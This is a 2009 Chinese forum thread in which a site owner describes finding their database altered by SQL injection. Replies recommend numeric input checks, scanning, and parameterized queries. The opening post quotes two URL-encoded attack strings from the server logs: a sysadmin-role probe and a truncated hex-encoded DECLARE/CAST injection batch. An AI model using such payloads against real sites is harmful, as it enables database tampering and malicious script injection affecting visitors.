设为首页收藏本站
切换到窄版

工大后院

 找回密码
 加入后院

扫一扫,访问微社区

QQ登录

只需一步,快速开始

搜索
工大后院»论坛 后院书塾 【编程】编程圣殿 网站被注入了~(T_T)
返回列表 发新帖
查看: 1775|回复: 4

网站被注入了~(T_T)

[复制链接]
xulrmb
发表于 2009-1-21 09:59 | 显示全部楼层 |阅读模式
昨天打开网站发现很慢,查看源文件发现很多没见过的<script>

原来被注入了,很严重,数据库每个表都被修改(幸好不是删除,我很久没备份了)

今天看了日志,找到了注入的地方

id=1%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1

Id=12%3B%44%65%43%4C%61%52%45%20%40%53%20%4E%76%41%72%43%48%61%52%28%34%30%30%30%29%3B%53%65%54%20%40%53%3D%43%61%53%74%28%30%78%34%34%30%30%36%35%30%30%36%33%30%30%36%43%30%30%36%31%30%30%37%32%30%30%36%35%30%30%32%30%30%

ID都没处理过就直接交给sql了。

这就是偷懒的下场~ 哎 [em06]
备份, 数据库, 源文件, 网站

相关帖子
回复

使用道具 举报

发表于 2009-1-21 11:22 | 显示全部楼层
一般过滤数字只能是数字,能减少很多问题
回复

使用道具 举报

发表于 2009-2-15 00:43 | 显示全部楼层
写个HTML非法字符判断类咯....其实不用写 网上大把~
回复

使用道具 举报

hmily
发表于 2009-2-15 11:50 | 显示全部楼层
可以用Acunetix WVS 查查网站上那些没有过滤的,过滤一下。
回复

使用道具 举报

发表于 2009-3-9 19:18 | 显示全部楼层
用占位来提交SQL就不会出现这种问题啦
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 加入后院

本版积分规则

QQ|Archiver|手机版|小黑屋|广告业务Q|工大后院 ( 粤ICP备10013660号 )

GMT+8, 2024-6-3 02:20

Powered by Discuz! X3.5

Copyright © 2001-2024 Tencent Cloud.

快速回复 返回顶部 返回列表